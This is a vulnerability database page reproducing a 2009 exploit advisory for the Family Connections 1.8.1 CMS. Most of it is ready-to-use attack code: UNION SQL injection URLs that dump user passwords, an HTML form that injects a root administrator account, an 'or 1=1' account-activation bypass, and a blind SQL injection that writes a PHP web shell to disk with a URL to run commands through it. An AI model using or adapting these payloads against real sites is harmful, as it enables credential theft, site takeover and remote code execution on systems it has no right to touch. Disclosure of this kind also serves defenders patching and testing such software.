Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21555
HistoryApr 01, 2009 - 12:00 a.m.

Family Connections 1.8.1 Multiple Remote Vulnerabilities

2009-04-0100:00:00
vulners.com
29
JSON

******* Salvatore "drosophila" Fresta *******

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com

[+] Bugs: [A] Multiple SQL Injection
[B] Create Admin User
[C] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]

[+] Menu

1) Bugs
2) Code
3) Fix

[+] Bugs

  • [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allows a registered user to view
username and password of all registered users.

  • [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allow a guest to create an account with
administrator privileges.

  • [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php

[+] Code

  • [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23

http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users

http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23

  • [B] Create Admin User

<html>
<head>
<title>Family Connection 1.8.1 Create Admin User Exploit</title>
</head>
<body>
<p>This exploit creates an user with administrator privileges
using follows information:<br>
Username: root<br>
Password: toor<br>
<form action="http://localhost/fcms/register.php&quot; method="POST">
<input type="hidden" name="username" value="blabla">
<input type="hidden" name="password" value="blabla">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="fname" value="blabla">
<input type="hidden" name="lname" value="blabla">
<input type="hidden" name="year"
value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root',
'root', '[email protected]', '00-00-00', 'root',
'7b24afc8bc80e548d66c4e7ff72171c5')#'">
<input type="submit" name="submit" value="Exploit">
</form>
</body>
</html>

To activate accounts:

http://www.site.com/path/activate.php?uid=1 or 1=1&code=

[C] Blind SQL Injection

POST /path/lostpw.php HTTP/1.1\r\n"
Host: www.site.com\r\n"
Content-Type: application/x-www-form-urlencoded\r\n"
Content-Length: 193\r\n\r\n"
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]);
echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
INTO OUTFILE '/var/www/htdocs/path/rce.php'#

To execute commands:

http://www.site.com/path/rce.php?cmd=ls

[+] Fix

No fix.


Salvatore "drosophila" Fresta
CWNP444351

JSON